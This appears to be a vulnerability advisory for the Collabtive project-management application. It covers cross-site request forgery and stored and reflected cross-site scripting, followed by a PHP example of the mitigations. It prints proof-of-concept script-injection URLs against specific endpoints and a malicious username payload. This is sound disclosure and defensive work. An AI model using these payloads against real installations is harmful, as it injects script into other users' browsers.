Exploit/POC: http://target/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script> http://target/thumb.php?pic=<script>alert(/XSS/)</script>
Description: Collabtive is affected by Cross-site Request Forgery. An attacker can create a specially crafted page, lure a Collabtive administrator into visiting it, and thereby gain administrative privileges. To prevent CSRF, the application needs an anti-CSRF token, a captcha, and a prompt for the current password on critical actions.
Description: Collabtive has a Stored Cross-site Scripting vulnerability. Any user can change their username; the application accepts HTML in the new value and stores it in the database, so the injected markup is rendered wherever that username is displayed.
Exploit/POC: Change username to "user<script>alert(/AS/)</script>".
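The mitigations the advisory calls for, shown together as an added defensive example (not Collabtive's own code): a per-session anti-CSRF token that is only accepted on POST, HTML encoding of the stored username before display, and a current-password check before a critical action. All function names (`csrf_token`, `csrf_check`, `safe_html`, `handle_password_change`) and the sample username are hypothetical.

```php
<?php
// Added defensive example, not Collabtive's code. Hypothetical helper names.
// Covers: anti-CSRF token, output encoding of usernames, old-password check.
session_start();

// Issue one random token per session; every state-changing form echoes it back.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject non-POST requests (a crafted page can trigger GET via <img>/<a>) and
// compare the submitted token in constant time against the session copy.
function csrf_check(): bool {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;
    }
    $sent = $_POST['csrf_token'] ?? '';
    return isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Encode user-controlled text before it reaches HTML, so a username such as
// "user<script>alert(/AS/)</script>" is shown literally instead of executed.
function safe_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Critical action: change the password. Requires a valid CSRF token and the
// current password. $storedHash is the password_hash() value from the database.
// Returns the new hash to persist, or null when the request is rejected.
function handle_password_change(string $storedHash): ?string {
    if (!csrf_check()) {
        http_response_code(403);
        return null;
    }
    if (!password_verify($_POST['old_password'] ?? '', $storedHash)) {
        http_response_code(403);
        return null;
    }
    return password_hash($_POST['new_password'] ?? '', PASSWORD_DEFAULT);
}

// Rendering the edit form: embed the token, encode the stored username.
$username = 'user<script>alert(/AS/)</script>'; // constructed sample value
echo '<input type="hidden" name="csrf_token" value="' . csrf_token() . '">';
echo '<p>Logged in as ' . safe_html($username) . '</p>';
```

The token check must run on every endpoint that changes state (including AJAX handlers such as manageajax.php), not only on HTML forms.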